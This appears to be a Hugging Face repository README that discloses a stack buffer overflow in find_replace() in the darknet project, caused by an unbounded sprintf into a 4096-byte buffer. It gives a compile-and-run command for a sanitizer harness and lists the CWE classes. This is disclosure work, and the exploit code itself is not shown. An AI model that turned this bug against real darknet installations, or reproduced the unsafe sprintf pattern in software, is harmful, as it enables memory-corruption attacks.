Hugging Face's logo

0xiviel
/
poc-darknet-sprintf-stack-bof

Model card Files
xet
 Community
poc-darknet-sprintf-stack-bof / README.md
0xiviel's picture
0xiviel
Upload README.md with huggingface_hub
9de94f0 verified
preview code
|
raw
history blame contribute delete
851 Bytes

PoC: Stack Buffer Overflow in find_replace() — pjreddie/darknet

Vulnerability

find_replace() in src/utils.c:221 uses sprintf(buffer, "%s", str) to copy an input string into a fixed char buffer[4096] on the stack. When the input string exceeds 4096 bytes, a stack buffer overflow occurs. This function is called with user-controlled file paths from .list training data files.

Files

  • poc_sprintf_overflow.c — Standalone harness demonstrating the overflow with the exact vulnerable function from src/utils.c:216-230

Reproduction 

gcc -fsanitize=address -fno-omit-frame-pointer -O0 -g poc_sprintf_overflow.c -o poc_sprintf
./poc_sprintf

Result: AddressSanitizer: stack-buffer-overflow in find_replace

CWE

  • CWE-121 (Stack-based Buffer Overflow)
  • CWE-120 (Buffer Copy without Checking Size of Input)